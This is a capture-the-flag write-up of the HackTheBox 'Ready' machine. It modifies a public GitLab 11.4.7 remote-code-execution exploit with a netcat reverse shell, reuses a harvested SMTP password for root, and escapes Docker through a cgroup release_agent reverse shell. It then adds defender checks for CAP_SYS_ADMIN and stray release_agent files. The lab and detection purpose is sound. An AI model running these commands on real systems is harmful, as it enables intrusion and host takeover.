HackTheBox-Ready WriteUp


IP: 10.10.10.220
Nmap

Port 22:   SSH
Port 5080: http://10.10.10.220:5080/users/sign_in  # GitLab Community Edition 11.4.7 (RCE)

Build Exploit:

https://www.exploit-db.com/exploits/49334

# The -P (reverse shell port) flag clashes with -p, so I renamed it to -port:
parser.add_argument('-port', help='reverse shell port', required=True)
local_port = args.port  # read the renamed argument here too
nc {local_ip} {local_port} -e /bin/bash  # this payload line needs changing as well

Foothold

nc -lvvp port  # listener on the attacking machine
python3 gitlab11.4.7.py -u username -p password -g http://10.10.10.220 -l ip -port port
python3 -c 'import pty;pty.spawn("/bin/bash")'  # upgrade to a proper TTY

User

cd /home/  # found the username: dude
/home/dude/user.txt  # user flag

Enum Root
python3 -m http.server 8080  # serve linpeas.sh from the attacking machine
wget http://ip:port/linpeas.sh  # run the script; the output shows we are inside a Docker container

Need to enumerate further.

Enum local

/opt/backup/*  # backup files found here
cat ./* | grep "passw"
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+#h"  # try it with su on the local users
wW59U!ZKMbG9+#h  # Docker root password (the "#h" is part of the password, not a comment)

Docker escape

https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
# Take the host-side path of the container's overlay upperdir from /etc/mtab
host_path=`sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

# We use a reverse shell as the release agent
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/ip/port 0>&1" >> /cmd
chmod a+x /cmd
#===================================
nc -lvvp 4444  # listener on the attacking machine
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"  # triggers the release agent on the host: root shell
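Two checks a defender would want next to this technique, written as an added example for this write-up (not code from the original post or from the linked HackTricks page): whether a container even has CAP_SYS_ADMIN (bit 21 of CapEff), which the cgroupfs mount in the first step requires, and a host-side scan for non-empty release_agent files, which is the footprint the technique leaves behind. It assumes a cgroup v1 tree with a release_agent file at each hierarchy root and the CapEff format of /proc/<pid>/status; the masks and paths in the stand-alone run and test are constructed.

```shell
#!/bin/sh
# Added defender-side checks for the cgroup release_agent escape shown above.
# Example code for this write-up, not part of the original exploit chain.
# Assumptions: cgroup v1 layout (release_agent at each hierarchy root) and
# CapEff as a 64-bit hex mask in /proc/<pid>/status (CAP_SYS_ADMIN = bit 21).

# has_cap_sys_admin MASK: exit 0 when bit 21 of the hex mask is set.
# Mounting cgroupfs inside a container, the escape's first step, needs
# CAP_SYS_ADMIN; a container whose CapEff lacks it cannot take that step.
has_cap_sys_admin() {
  mask="$1"
  [ "$(( (0x$mask >> 21) & 1 ))" -eq 1 ]
}

# capeff_from_status [FILE]: pull the CapEff value out of a status file
# (defaults to the calling process's own /proc/self/status).
capeff_from_status() {
  awk '/^CapEff:/ { print $2 }' "${1:-/proc/self/status}"
}

# scan_release_agents [ROOT]: print "ALERT: path -> agent" for every
# release_agent file under ROOT (default /sys/fs/cgroup) with content.
# On an untouched host these files are empty; a path like
# /var/lib/docker/overlay2/<id>/diff/cmd is what this technique writes.
scan_release_agents() {
  root="${1:-/sys/fs/cgroup}"
  find "$root" -name release_agent -type f 2>/dev/null | while read -r f; do
    agent=$(cat "$f" 2>/dev/null)
    if [ -n "$agent" ]; then
      printf 'ALERT: %s -> %s\n' "$f" "$agent"
    fi
  done
}

# count_release_agents [ROOT]: number of alerts scan_release_agents prints.
count_release_agents() {
  scan_release_agents "$1" | wc -l | tr -d ' '
}

# Stand-alone use: ./check.sh --run (inside a container or on the host).
if [ "${1:-}" = "--run" ]; then
  if has_cap_sys_admin "$(capeff_from_status)"; then
    echo "CAP_SYS_ADMIN present: cgroupfs can be mounted from this context"
  else
    echo "CAP_SYS_ADMIN absent: release_agent escape precondition not met"
  fi
  scan_release_agents
fi
```

The capability check is the cheap hardening signal: containers started with --privileged (or --cap-add SYS_ADMIN) pass it, a default Docker container does not. The release_agent scan is the host-side detection; it is only meaningful on cgroup v1, since cgroup v2 has no release_agent file at all, which is itself a mitigation for this technique.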